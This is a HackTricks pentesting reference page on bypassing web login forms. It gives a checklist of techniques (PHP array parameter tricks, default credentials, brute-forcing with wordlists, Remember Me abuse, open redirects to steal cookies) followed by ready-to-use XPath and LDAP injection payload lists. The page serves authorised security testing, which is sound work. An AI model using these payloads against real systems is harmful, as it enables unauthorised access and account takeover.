HackTricks
Search…
Pentesting
Powered By GitBook
Login Bypass

Bypass regular login

If you find a login page, here you can find some techniques to try to bypass it:
    Check for comments inside the page (scroll down and to the right?)
    Check if you can directly access the restricted pages
    Check to not send the parameters (do not send any or only 1)
    Check the PHP comparisons error: user[]=a&pwd=b , user=a&pwd[]=b , user[]=a&pwd[]=b
    Check credentials:
      Default credentials of the technology/platform used
      Common combinations (root, admin, password, name of the tech, default user with one of these passwords).
      Create a dictionary using Cewl, add the default username and password (if there is) and try to brute-force it using all the words as usernames and password
      Brute-force using a bigger dictionary (Brute force)

SQL Injection authentication bypass

In the following page you can find a custom list to try to bypass login via SQL Injections:

No SQL Injection authentication bypass

As the NoSQL Injections requires to change the parameters value, you will need to test them manually.

XPath Injection authentication bypass

1
' or '1'='1
2
' or ''='
3
' or 1]%00
4
' or /* or '
5
' or "a" or '
6
' or 1 or '
7
' or true() or '
8
'or string-length(name(.))<10 or'
9
'or contains(name,'adm') or'
10
'or contains(.,'adm') or'
11
'or position()=2 or'
12
admin' or '
13
admin' or '1'='2
Copied!

LDAP Injection authentication bypass

1
*
2
*)(&
3
*)(|(&
4
pwd)
5
*)(|(*
6
*))%00
7
admin)(&)
8
pwd
9
admin)(!(&(|
10
pwd))
11
admin))(|(|
Copied!

Remember Me

If the page has "Remember Me" functionality check how is it implemented and see if you can abuse it to takeover other accounts.

Redirects

Pages usually redirects users after login, check if you can alter that redirect to cause an Open Redirect. Maybe you can steal some information (codes, cookies...) if you redirect the user to your web.

Other Checks

    Check if you can enumerate usernames abusing the login functionality.
    Check if auto-complete is active in the password/sensitive information forms input: <input autocomplete="false"
Last modified 3mo ago